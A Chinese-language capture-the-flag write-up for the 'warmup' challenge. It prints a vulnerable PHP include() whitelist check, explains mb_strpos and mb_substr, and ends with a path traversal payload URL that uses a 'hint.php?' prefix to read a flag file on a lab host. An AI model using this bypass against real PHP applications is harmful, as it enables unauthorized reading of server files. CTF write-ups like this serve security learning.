攻防世界-warmup

warmup

进入source.php 查看源码(代码审计)

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

先介绍两个函数：mb_strpos mb_substr

mb_strpos:查找字符串在另一字符串中第一次出现的位置（区分大小写）

mb_strpos(string,find,start)

string ->(必需)规定被搜索的字符串。

find ->(必需)规定要查找的字符。

start ->(可选)规定开始搜索的位置。

例如：

<?php
echo strpos("I love php, I love php too!","php");
?>
//输出：7

mb_substr：截取函数

mb_substr( str, start, length, encoding )

str ->需要截断的字符串

start ->截断开始处，起始处为0
length ->要截取的字数
encoding ->网页编码，如utf-8,GB2312,GBK

例如：

<?php
$str='你好世界,fhdsjhfjksdkj';
echo mb_substr($str,0,4,'utf-8');//截取头5个字，假定此代码所在php文件的编码为utf-8
?>
//输出： 你好世界

代码解析：对file参数进行传入，检查是否为空，检查是否为字符串，截取字符串，检查是否包含白名单。

尝试：http://61.147.171.105:54988/source.php?file=hint.php

成功回显

构造pyload http://61.147.171.105:54988/source.php?file=hint.php?/…/…/…/…/ffffllllaaaagggg